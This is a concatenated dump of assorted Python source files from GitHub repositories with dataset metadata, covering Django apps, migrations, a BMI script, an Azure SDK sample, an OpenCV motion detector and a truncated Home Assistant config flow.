def test_addr_assignment():
target_addr = ("127.0.0.1", 1337)
set_show_addr(target_addr)
actual_addr = get_show_addr()
assert target_addr == actual_addr
shutdown_show_server()
| [
"interpretml@outlook.com"
] | interpretml@outlook.com |
aeb1ba7b12cf83d1a171bfd95e019d04261e82be | bfe1d367f09969c5f99b66960d23bd23db2d1cfd | /migrations/versions/d7da7d3067a1_followers.py | 8862d09bb2ba3c2aaac8674c244ba8ca132e5f14 | [] | no_license | sockduct/myblog | f97ed3e97262ea2d175499fb3acb7eac98cd3567 | 1b0a30e21c119b6c494d2f6241ff346a3bbcd4e9 | refs/heads/master | 2022-12-08T22:35:08.921777 | 2018-12-27T11:31:32 | 2018-12-27T11:31:32 | 160,174,872 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 840 | py | """followers
Revision ID: d7da7d3067a1
Revises: 470ad871bbde
Create Date: 2018-11-20 07:53:39.417383
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'd7da7d3067a1'
down_revision = '470ad871bbde'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('followers',
sa.Column('follower_id', sa.Integer(), nullable=True),
sa.Column('followed_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['followed_id'], ['user.id'], ),
sa.ForeignKeyConstraint(['follower_id'], ['user.id'], )
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('followers')
# ### end Alembic commands ###
| [
"james.r.small@outlook.com"
] | james.r.small@outlook.com |
a4ff7a1359bc8e2211bd34192f2b5c15102c5918 | 061a223e2207d9d8743979be1c64cf4a1ffa7920 | /src/pretix/base/migrations/0002_auto_20151021_1412.py | 69380c7e0f47d1430bc6ca50835ae1d940525e41 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | cygery/pretix | 925bf8e612f305d87aa9acbef02fa7697917a15c | 232c42b265bdbcd535dca2dec98c73dbca9becd9 | refs/heads/master | 2021-01-18T02:50:20.297908 | 2015-10-22T15:45:19 | 2015-10-22T15:45:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 502 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('pretixbase', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='quota',
name='size',
field=models.PositiveIntegerField(help_text='Leave empty for an unlimited number of tickets.', verbose_name='Total capacity', blank=True, null=True),
),
]
| [
"mail@raphaelmichel.de"
] | mail@raphaelmichel.de |
7c38e98199e0c1619b75fb425ef013bfde8a52dc | 205e2d038ad3fd01e4072e5f7fcc0d32dbea341f | /06函数/03/function_bmi_upgrade.py | 7ca38bf21a62d1d00a09f7f99cd38defea8627e4 | [] | no_license | xiaohema233/LearnPythonWithZeroFoundation | b35cd95a13389a2d97ab4a4eff73fddb18ab85c8 | da9f4579b76e3b951dd0870664744014538fdb14 | refs/heads/master | 2022-10-24T10:42:30.453209 | 2020-06-13T07:32:00 | 2020-06-13T07:32:00 | 271,948,165 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,445 | py | def fun_bmi_upgrade(*person):
"""功能:根据身高和体重计算BMI指数(升级版)
*person:可变参数该参数中需要传递带3个元素的列表,
分别为姓名、身高(单位:米)和体重(单位:千克)
"""
for list_person in person:
for item in list_person:
person = item[0] # 姓名
height = item[1] # 身高(单位:米)
weight = item[2] # 体重(单位:千克)
print("\n" + "=" * 13, person, "=" * 13)
print("身高:" + str(height) + "米 \t 体重:" + str(weight) + "千克")
bmi = weight / (height * height) # 用于计算BMI指数,公式为“体重/身高的平方”
print("BMI指数:" + str(bmi)) # 输出BMI指数
# 判断身材是否合理
if bmi < 18.5:
print("您的体重过轻 ~@_@~")
if 18.5 <= bmi < 24.9:
print("正常范围,注意保持 (-_-)")
if 24.9 <= bmi < 29.9:
print("您的体重过重 ~@_@~")
if bmi >= 29.9:
print("肥胖 ^@_@^")
# *****************************调用函数***********************************#
list_w = [('绮梦', 1.70, 65), ('零语', 1.77, 50), ('黛兰', 1.72, 66)]
list_m = [('梓轩', 1.80, 75), ('冷伊一', 1.75, 70)]
fun_bmi_upgrade(list_w, list_m) # 调用函数指定可变参数
| [
"33052287+xiaohema233@users.noreply.github.com"
] | 33052287+xiaohema233@users.noreply.github.com |
e295fde13f0aa807766ef22576da20670075e3a5 | 82074ba616918ede605dec64b038546a7b07bd7d | /app/reports/report_amp.py | 57d0c3ba657966103e6c93e3b2adfc42283e2a16 | [] | no_license | chetankhopade/EmpowerRM | b7ab639eafdfa57c054a0cf9da15c3d4b90bbd66 | 8d968592f5e0d160c56f31a4870e79c30240b514 | refs/heads/main | 2023-07-05T03:20:13.820049 | 2021-08-26T11:56:28 | 2021-08-26T11:56:28 | 399,354,317 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,515 | py | import datetime
from datetime import timedelta
from django.contrib.auth.decorators import login_required
from django.http import HttpResponseRedirect, JsonResponse
from django.shortcuts import render
from django.urls import reverse
from django.views.decorators.csrf import csrf_exempt
from app.management.utilities.exports import export_report_to_excel, export_report_to_csv
from app.management.utilities.functions import convert_string_to_date, datatable_handler, bad_json, dates_exceeds_range
from app.management.utilities.globals import addGlobalData
from app.reports.reports_structures import get_amp_report_structure
from erms.models import (ChargeBackLineHistory)
@login_required(redirect_field_name='ret', login_url='/login')
def view(request):
"""
User's AMP Report
"""
data = {'title': 'AMP Data Report', 'header_title': 'AMP Data Report'}
addGlobalData(request, data)
if not data['company'] or not data['has_access_to_company']:
return HttpResponseRedirect(reverse('companies'))
# activate menu option
data['menu_option'] = 'menu_reports'
return render(request, "reports/amp.html", data)
@login_required(redirect_field_name='ret', login_url='/login')
@csrf_exempt
def load_data(request):
"""
call DT Handler function with the required params: request, queryset and search_fields
"""
try:
# all ChargeBackLineHistory
start_date_str = request.POST.get('start_date', '')
end_date_str = request.POST.get('end_date', '')
start_date = None
end_date = None
if start_date_str and end_date_str:
start_date = convert_string_to_date(start_date_str)
end_date = convert_string_to_date(end_date_str)
# EA-1355 - limit all reports to pull only 2 years of data at most
date_range_exceeds = dates_exceeds_range(start_date, end_date, 2)
if date_range_exceeds:
return bad_json(message="Date range should not exceed beyond 2 years")
if start_date_str and not end_date_str:
start_date = convert_string_to_date(start_date_str)
end_date = convert_string_to_date(datetime.datetime.now().date().strftime('%m/%d/%Y'))
if end_date_str and not start_date_str:
end_date = convert_string_to_date(end_date_str)
start_date = end_date - timedelta(days=365)
queryset = None
if start_date and end_date:
queryset = ChargeBackLineHistory.objects.filter(updated_at__date__range=[start_date, end_date]).exclude(claim_amount_issue=0).order_by('cblnid')
if not queryset:
return JsonResponse({
'data': [],
'recordsTotal': 0,
'recordsFiltered': 0,
})
search_fields = ['cbtype', 'cb_cm_number', 'customer', 'distributor', 'distributor_city', 'distributor_state',
'distributor_zipcode', 'contract_name', 'contract_no', 'invoice_no', 'indirect_customer_name',
'indirect_customer_location_no', 'indirect_customer_address1', 'indirect_customer_address2',
'indirect_customer_city', 'indirect_customer_state', 'indirect_customer_zipcode', 'item_ndc',
'item_brand', 'item_description', 'item_uom', 'item_qty', 'wac_system', 'wac_submitted',
'claim_amount_system', 'claim_amount_submitted', 'cbnumber']
response = datatable_handler(request=request, queryset=queryset, search_fields=search_fields)
return JsonResponse(response)
except Exception as ex:
return bad_json(message=ex.__str__())
@login_required(redirect_field_name='ret', login_url='/login')
def export(request):
try:
export_to = request.GET.get('export_to', 'excel')
start_date_str = request.GET.get('sd', '')
end_date_str = request.GET.get('ed', '')
start_date = None
end_date = None
if start_date_str and end_date_str:
start_date = convert_string_to_date(start_date_str)
end_date = convert_string_to_date(end_date_str)
if start_date_str and not end_date_str:
start_date = convert_string_to_date(start_date_str)
end_date = convert_string_to_date(datetime.datetime.now().date().strftime('%m/%d/%Y'))
if end_date_str and not start_date_str:
end_date = convert_string_to_date(end_date_str)
start_date = end_date - timedelta(days=365)
cblines_history = []
if start_date and end_date:
cblines_history = ChargeBackLineHistory.objects.filter(updated_at__date__range=[start_date, end_date]).exclude(claim_amount_issue=0).order_by('cblnid')
time1 = datetime.datetime.now()
# Structure
structure = get_amp_report_structure()
# Export to excel or csv
if export_to == 'excel':
filename = f"{datetime.datetime.now().strftime('%Y-%m-%d')}_amp_report.xlsx"
response = export_report_to_excel(cblines_history, filename, structure)
else:
filename = f"{datetime.datetime.now().strftime('%Y-%m-%d')}_amp_report.csv"
response = export_report_to_csv(cblines_history, filename, structure)
time2 = datetime.datetime.now()
delta = (time2 - time1).total_seconds()
print(f"Delta Time Export: {delta} sec")
return response
except Exception as ex:
print(ex.__str__())
| [
"noreply@github.com"
] | chetankhopade.noreply@github.com |
39dd28a5b187c7e69548e7fb1a343b9abc4b6ff5 | dfeff5d7da852d8dfb4ab10cb9b6a902041eb313 | /website/forms.py | b7b4848a6ff8e8fac9c368ae8d34c1ecd967118b | [] | no_license | jdriscoll98/TorresLawPayments | adac6348e7e4dc0df01142f68b5ce91e1ecd5a8e | b9e59478866924a954f9c9d818b97ed1591d6a96 | refs/heads/master | 2021-06-21T05:30:18.019685 | 2020-01-22T02:46:14 | 2020-01-22T02:46:14 | 219,618,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,392 | py | from django import forms
from phonenumber_field.formfields import PhoneNumberField
class NewClientForm(forms.Form):
name = forms.CharField(max_length=200)
email = forms.EmailField(max_length=254)
phone_number = PhoneNumberField() # validators should be a list
monthly_payment = forms.DecimalField(max_digits=10, decimal_places=2)
total_amount_due = forms.DecimalField(max_digits=10, decimal_places=2)
admin_fee = forms.DecimalField(max_digits=10, decimal_places=2)
first_payment_date = forms.DateField(required=False)
def clean_monthly_payment(self):
monthly_payment = self.cleaned_data['monthly_payment']
if monthly_payment < 0:
raise forms.ValidationError("Please enter a positive value")
return monthly_payment
def clean_total_amount_due(self):
total_amount_due = self.cleaned_data['total_amount_due']
if total_amount_due < 0:
raise forms.ValidationError("Please enter a positive value")
return total_amount_due
# def clean_phone_number(self, form):
# data = self.cleaned_data['phone_number']
# if "fred@example.com" not in data:
# raise forms.ValidationError("You have forgotten about Fred!")
# # Always return a value to use as the new cleaned data, even if
# # this method didn't change it.
# return data
| [
"41447166+jdriscoll98@users.noreply.github.com"
] | 41447166+jdriscoll98@users.noreply.github.com |
ca4b0d329a6fa697df06e68aa0d627f9e1bc4182 | f576f0ea3725d54bd2551883901b25b863fe6688 | /sdk/communication/azure-communication-phonenumbers/samples/get_purchased_phone_number_sample.py | 562eff620cef4cf89444f8caff02db237857b51b | [
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] | permissive | Azure/azure-sdk-for-python | 02e3838e53a33d8ba27e9bcc22bd84e790e4ca7c | c2ca191e736bb06bfbbbc9493e8325763ba990bb | refs/heads/main | 2023-09-06T09:30:13.135012 | 2023-09-06T01:08:06 | 2023-09-06T01:08:06 | 4,127,088 | 4,046 | 2,755 | MIT | 2023-09-14T21:48:49 | 2012-04-24T16:46:12 | Python | UTF-8 | Python | false | false | 1,558 | py | # coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
"""
FILE:get_purchased_phone_number_sample.py
DESCRIPTION:
This sample demonstrates how to get the information from an acquired phone number using your connection string
USAGE:
python get_purchased_phone_number_sample.py
Set the environment variables with your own values before running the sample:
1) COMMUNICATION_SAMPLES_CONNECTION_STRING - The connection string including your endpoint and
access key of your Azure Communication Service
2) AZURE_PHONE_NUMBER - The phone number you want to get its information
"""
import os
from azure.communication.phonenumbers import (
PhoneNumbersClient
)
connection_str = os.getenv('COMMUNICATION_SAMPLES_CONNECTION_STRING')
phone_number = os.getenv("AZURE_PHONE_NUMBER") # e.g. "+18001234567"
phone_numbers_client = PhoneNumbersClient.from_connection_string(connection_str)
def get_purchased_phone_number_information():
purchased_phone_number_information = phone_numbers_client.get_purchased_phone_number(phone_number)
print('Phone number: ' + purchased_phone_number_information.phone_number)
print('Country code: ' + purchased_phone_number_information.country_code)
if __name__ == '__main__':
get_purchased_phone_number_information()
| [
"noreply@github.com"
] | Azure.noreply@github.com |
dd976bc4291db029b6f0a14de8e8e7701759e5b5 | dd2c8e0a8895ffb217813efb24568c34921cbcf1 | /tests/test_field.py | c7b16627cc419c58e0489f094a5f2a2bf2992cef | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | saxix/django-strategy-field | c543ccf101f473994da407def7671f1c2d1dba41 | 0c92b47976e39a4e8c06e5abfa21033af5a3e806 | refs/heads/develop | 2022-09-10T01:10:01.135944 | 2022-08-23T14:01:07 | 2022-08-23T14:01:07 | 26,797,927 | 17 | 3 | NOASSERTION | 2021-12-09T17:19:48 | 2014-11-18T07:45:50 | Python | UTF-8 | Python | false | false | 929 | py | import logging
import pytest
from django.core.mail.backends.filebased import EmailBackend
from demoproject.demoapp.models import DemoModelNoRegistry
logger = logging.getLogger(__name__)
# @pytest.mark.django_db
# def test_valid_class():
# d = DemoModelNoRegistry(klass='a.b.c')
# with pytest.raises(ValidationError):
# d.clean_fields()
class Dummy:
pass
@pytest.mark.django_db
def test_no_registry_assign_class():
d = DemoModelNoRegistry(klass=Dummy)
d.save()
assert d.klass == Dummy
@pytest.mark.django_db
def test_no_registry_assign_instance():
d = DemoModelNoRegistry(instance=Dummy)
d.save()
assert isinstance(d.instance, Dummy)
@pytest.mark.django_db
def test_no_registry_assign_string():
d = DemoModelNoRegistry(instance='django.core.mail.backends.filebased.EmailBackend')
d.save()
assert isinstance(d.instance, EmailBackend)
assert d.instance.open()
| [
"s.apostolico@gmail.com"
] | s.apostolico@gmail.com |
39641467aa7ab39ab1fcd6172a25743cbdf618ba | 3d705ec48c94373817e5f61d3f839988910431e3 | /lib/platform/dataprocess/testdata/MonthlyPeerActivity.py | 0ae6c9885b06e65b5deb4586b28678c73cfdb018 | [] | no_license | namesuqi/zeus | 937d3a6849523ae931162cd02c5a09b7e37ebdd8 | 3445b59b29854b70f25da2950016f135aa2a5204 | refs/heads/master | 2022-07-24T14:42:28.600288 | 2018-03-29T08:03:09 | 2018-03-29T08:03:09 | 127,256,973 | 0 | 0 | null | 2022-07-07T22:57:57 | 2018-03-29T07:53:16 | Python | UTF-8 | Python | false | false | 907 | py | import sys
import os
sys.path.append(os.path.abspath(os.path.dirname(__file__) + '/' + '..'))
def makeexpecteddata(hour=-1):
with open(os.path.abspath(os.path.dirname(__file__)) + '/../inputdata/MonthlyDistinctPeerID.txt', 'r') as resultfile:
orglines = resultfile.readlines()
expectedfile = open(os.path.abspath(os.path.dirname(__file__)) + "/../inputdata/%s.txt"%__name__.split('.')[-1],"w")
peeridprefix={}
for line in orglines:
peerid,_ = line.split(',')
if peerid[:8] not in peeridprefix:
peeridprefix[peerid[:8]] = 1
else:
peeridprefix[peerid[:8]] = peeridprefix[peerid[:8]] + 1
for prefix,count in peeridprefix.items():
expectedfile.write('%s,%d,%s\n' % (prefix,count,''))
expectedfile.close()
return os.path.abspath(os.path.dirname(__file__)) + "/../inputdata/%s.txt"%__name__.split('.')[-1]
| [
"suqi_name@163.com"
] | suqi_name@163.com |
e86e6c51e9f3fd1ff1426620e49ec00ce6d705e8 | 4a770290fe9201c39162cf0210d0d2b858f4b26a | /src/AuthTokenSerializer.py | 0783a415eeae394894ba3743fc42e60d7454765c | [] | no_license | FuckBrains/geekflex | 7e1d8783053313c301c8848d1aa23b03e8f5b0d6 | 72f048e336619f65c8558b7ec4bdf9ece53e71c3 | refs/heads/master | 2023-04-21T01:22:49.410096 | 2020-06-04T15:54:02 | 2020-06-04T15:54:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,680 | py | from django.contrib.auth import authenticate
from django.utils.translation import gettext_lazy as _
from rest_framework.exceptions import ValidationError
from rest_framework import serializers
from custom_exception_message import *
class AuthTokenSerializer(serializers.Serializer):
username = serializers.CharField(label=_("Username"))
password = serializers.CharField(
label=_("Password"),
style={'input_type': 'password'},
trim_whitespace=False,
required=False
)
auth_provider = serializers.CharField(required=False)
def validate(self, attrs):
print("attrs",attrs)
auth_provider = attrs.get('auth_provider')
# print("auth_provider",auth_provider)
#changes done by abhisek singh
if auth_provider.lower()== 'admin':
username = attrs.get('username')
password = attrs.get('password')
# if username is and password :
print("username",username,'password',password)
if username and password :
user = authenticate(request=self.context.get('request'),
username=username, password=password,auth_provider=auth_provider)
# The authenticate call simply returns None for is_active=False
# users. (Assuming the default ModelBackend authentication
# backend.)
if not user:
msg = _('Unable to log in with provided credentials.')
# raise serializers.ValidationError(msg, code='authorization')
raise CustomAPIException(None,msg,status_code=status.HTTP_200_OK)
else:
msg = _('Provided credentials with username and password cannot be blank .')
raise CustomAPIException(None,msg,status_code=status.HTTP_400_BAD_REQUEST)
elif auth_provider.lower()== 'kidsclub':
username = attrs.get('username')
password = attrs.get('password')
# if username is and password :
print("username",username,'password',password,'auth_provider',auth_provider)
if username and password :
# if (username is not None or username is not "") and (password is not None or password is not ""):
user = authenticate(request=self.context.get('request'),
username=username, password=password,auth_provider=auth_provider)
# The authenticate call simply returns None for is_active=False
# users. (Assuming the default ModelBackend authentication
# backend.)
if not user:
msg = _('Unable to log in with provided credentials.')
# raise serializers.ValidationError(msg, code='authorization')
raise CustomAPIException(None,msg,status_code=status.HTTP_200_OK)
else:
msg = _('Provided credentials with username and password cannot be blank .')
raise CustomAPIException(None,msg,status_code=status.HTTP_400_BAD_REQUEST)
elif auth_provider.lower()== 'subchild':
username = attrs.get('username')
password = attrs.get('password')
# if username is and password :
print("username",username,'password',password,'auth_provider',auth_provider)
if username and password :
# if (username is not None or username is not "") and (password is not None or password is not ""):
user = authenticate(request=self.context.get('request'),
username=username, password=password,auth_provider=auth_provider)
print("user",user)
# The authenticate call simply returns None for is_active=False
# users. (Assuming the default ModelBackend authentication
# backend.)
if not user:
msg = _('Unable to log in with provided credentials.')
# raise serializers.ValidationError(msg, code='authorization')
raise CustomAPIException(None,msg,status_code=status.HTTP_200_OK)
else:
msg = _('Provided credentials with username and password cannot be blank .')
raise CustomAPIException(None,msg,status_code=status.HTTP_400_BAD_REQUEST)
elif auth_provider.lower() == 'facebook' or auth_provider.lower() == 'google':
username = attrs.get('username')
if username :
user = authenticate(request=self.context.get('request'),
username=username,auth_provider=auth_provider)
# The authenticate call simply returns None for is_active=False
# users. (Assuming the default ModelBackend authentication
# backend.)
if not user:
msg = _('Unable to log in with provided credentials.')
# raise serializers.ValidationError(msg, code='authorization')
raise CustomAPIException(None,msg,status_code=status.HTTP_200_OK)
else:
msg = _('Must include "username" and "password".')
# raise serializers.ValidationError(msg, code='authorization')
raise ValidationError({
"error":{
'request_status': 0,
'msg': msg
}
})
attrs['user'] = user
return attrs | [
"abhishek.singh@shyamfuture.com"
] | abhishek.singh@shyamfuture.com |
cc74541a939aef0c5ad8e6b75077aa486fe02deb | 5d573c2e3a90e8c4e3b884d54aacd4a44d5d0b87 | /Python/python_stack/Django/main/apps/vinmyMVC/urls.py | 21c8fbe20ab9cff1240f9595f9784c6c44aa3994 | [] | no_license | RubenDuran/DojoAssignments | 42d12088feabee09eb1874da010e594b0eb7da18 | aa691ae2c41a35f632fa082fbf2eae60ea1f4601 | refs/heads/master | 2021-01-19T20:57:31.962140 | 2018-02-13T01:40:07 | 2018-02-13T01:40:07 | 88,580,713 | 0 | 2 | null | 2017-06-07T22:01:32 | 2017-04-18T04:14:30 | Python | UTF-8 | Python | false | false | 134 | py | from django.conf.urls import url d
from . import views
urlpatterns = [
url(r'^$', views.index),
url(r'^users$', views.show)
]
| [
"rd@rubenduran.net"
] | rd@rubenduran.net |
bf084a4d641ccb146774e29836ec3816e58686eb | 69cb95793176da6cc64c109028358184c04f0614 | /furniture_project/settings.py | 5722f6b28964c46f1ef0f7b26f6114b44ca1f5dd | [] | no_license | viralsir/furniture_project | e8b0275a175a058a3c49b841c53501ae0421b688 | 8823988eedf7d13844d429056cbebace12657790 | refs/heads/master | 2023-06-02T02:15:28.030895 | 2021-06-24T10:55:11 | 2021-06-24T10:55:11 | 379,879,513 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,417 | py | """
Django settings for furniture_project project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'django-insecure-e#0uv-2a7mtpse(9z9u=qg1ibcp9@b=&e_2!p0(lmiwb&=_b_*'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'users.apps.UsersConfig',
'crispy_forms',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'furniture_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates']
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'furniture_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
CRISPY_TEMPLATE_PACK='bootstrap4'
LOGIN_REDIRECT_URL='user-home' | [
"viralsir2018@gmail.com"
] | viralsir2018@gmail.com |
80fe5968b58c6bc39a226d89c6a53f4b943bec80 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_117/1697.py | 2d533ed7e58f2a6b946b3996a912c5ea1547f56b | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,421 | py | #!/usr/bin/python
"""
lawnmower.py
google code jam
Date: April 13, 2013
"""
# Imports
import sys, os
__version__ = "0.0"
__copyright__ = "CopyRight (C) 2012-13 by Coding Assassin"
__license__ = "MIT"
__author__ = "Coding Assassin"
__author_email__ = "Coding Assassin, codingassassin@gmail.com"
USAGE = "%prog [options]"
VERSION = "%prog v" + __version__
AGENT = "%s/%s" % (__name__, __version__)
def main():
# Open files
w = open("output.txt", 'w')
f = open("workfile.txt", 'r')
T = int(f.readline())
for i in range(T):
buff = f.readline().split()
N = int(buff[0])
M = int(buff[1])
# Load into arr
arr = []
for n in range(N):
arr.append(f.readline().rstrip().split())
for a in arr:
print a
# check for maximum in row and column
possible = True
for n in range(N):
for m in range(M):
rowPos = True
colPos = True
# check for max in row
if max(arr[n]) > arr[n][m]:
rowPos = False
# check for max in column
for x in range(N):
if arr[x][m] > arr[n][m]:
colPos = False
break
if rowPos == False and colPos == False:
possible = False
break
if possible == False:
break
if possible == False:
w.write("Case #"+str(i+1)+": NO\n")
print "Case #"+str(i+1)+": NO"
else:
w.write("Case #"+str(i+1)+": YES\n")
print "Case #"+str(i+1)+": YES"
if __name__ == '__main__':
main()
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
4fac6b7a9628197b6fe387f186a7fc07623e4ca6 | 14b5679d88afa782dc5d6b35878ab043089a060a | /students/20171587wangyubin/house_class/vcap1.py | f0ffe88f3375d9602fec4d65ea1638ee0c2c9ff9 | [] | no_license | mutiangua/EIS2020 | c541ef32623f67f9277945cd39cff3c02f06e4dd | 92aa2711b763a2c93be238825c445bf2db8da391 | refs/heads/master | 2022-11-18T05:21:47.567342 | 2020-07-11T10:11:21 | 2020-07-11T10:11:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,737 | py | import cv2
import numpy as np
import os
import time
def movedetect():
cap = cv2.VideoCapture(0)
background = None
temp = 0
while True:
# 读取视频流
ret, frame= cap.read()
gray_lwpCV = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# 将第一帧设置为整个输入的背景
if background is None:
background = gray_lwpCV
continue
# 对于每个从背景之后读取的帧都会计算其与背景之间的差异,并得到一个差分图(different map)。
diff = cv2.absdiff(background, gray_lwpCV)
diff = cv2.threshold(diff, 100, 255, cv2.THRESH_BINARY)[1] # 二值化阈值处理
# 显示矩形框
contours, hierarchy = cv2.findContours(diff.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE) # 该函数计算一幅图像中目标的轮廓
count = 0
for c in contours:
if cv2.contourArea(c) < 2000: # 对于矩形区域,只显示大于给定阈值的轮廓,所以一些微小的变化不会显示。对于光照不变和噪声低的摄像头可不设定轮廓最小尺寸的阈值
continue
(x, y, w, h) = cv2.boundingRect(c) # 该函数计算矩形的边界框
cv2.rectangle(frame, (x, y), (x+w, y+h), (0, 255, 0), 2)
count += 1
if temp != 0:
if count > temp : # 方框变多视为运动物体进入
os.system("test.wav")
time.sleep(6)
temp = count
cv2.imshow('contours', frame)
cv2.imshow('dis', diff)
key = cv2.waitKey(1) & 0xFF
# 按'q'健退出循环
if key == ord('q'):
cap.release()
cv2.destroyAllWindows()
break
# When everything done, release the capture
while True:
movedetect() | [
"noreply@github.com"
] | mutiangua.noreply@github.com |
02e26a493efe213d0a3b77f60ce46f37ef39a36e | 4910c0f3d03935fc8ee03f1e9dc20dfdb2c7c04b | /Codigos estudiantes por lenguaje/PY/Bryann Valderrama/Grafos/BipartiteGraph.py | d04bb54e45d392f35ce30a386bc046a34184b7b6 | [] | no_license | roca12/gpccodes | ab15eeedc0cadc0735651262887b44f1c2e65b93 | aa034a3014c6fb879ec5392c51f9714bdc5b50c2 | refs/heads/master | 2023-02-01T13:49:27.563662 | 2023-01-19T22:50:58 | 2023-01-19T22:50:58 | 270,723,328 | 3 | 5 | null | null | null | null | UTF-8 | Python | false | false | 705 | py | V = 4
def isBipartite(G, src):
colorArr = [-1 for x in range(V)]
colorArr[src] = 1
q = []
q.append(src)
while not len(q) == 0:
u = q.pop()
if (G[u][u] == 1):
return False
for v in range(V):
if (G[u][u] == 1 and colorArr[v] == 1):
colorArr[v] = 1 - colorArr[u]
q.append(v)
elif (G[u][v] == 1 and colorArr[v] == colorArr[u]):
return False
return True
if __name__ == '__main__':
G = [[0, 1, 0, 1],
[1, 0, 1, 0],
[0, 1, 0, 1],
[1, 0, 1, 0]]
if (isBipartite(G, 0)):
print('Es bipartito')
else:
print('No es Bipartito')
| [
"noreply@github.com"
] | roca12.noreply@github.com |
5285bc090689cadec3f1c61678c4e661e70d5554 | c9094a4ed256260bc026514a00f93f0b09a5d60c | /homeassistant/components/ovo_energy/config_flow.py | 0b2f7aac2d0dd332aa5b63b9f04288dab3f820d5 | [
"Apache-2.0"
] | permissive | turbokongen/home-assistant | 824bc4704906ec0057f3ebd6d92788e096431f56 | 4ab0151fb1cbefb31def23ba850e197da0a5027f | refs/heads/dev | 2023-03-12T05:49:44.508713 | 2021-02-17T14:06:16 | 2021-02-17T14:06:16 | 50,231,140 | 4 | 1 | Apache-2.0 | 2023-02-22T06:14:30 | 2016-01-23T08:55:09 | Python | UTF-8 | Python | false | false | 3,440 | py | """Config flow to configure the OVO Energy integration."""
import aiohttp
from ovoenergy.ovoenergy import OVOEnergy
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.config_entries import ConfigFlow
from homeassistant.const import CONF_PASSWORD, CONF_USERNAME
from .const import DOMAIN # pylint: disable=unused-import
REAUTH_SCHEMA = vol.Schema({vol.Required(CONF_PASSWORD): str})
USER_SCHEMA = vol.Schema(
{vol.Required(CONF_USERNAME): str, vol.Required(CONF_PASSWORD): str}
)
class OVOEnergyFlowHandler(ConfigFlow, domain=DOMAIN):
"""Handle a OVO Energy config flow."""
VERSION = 1
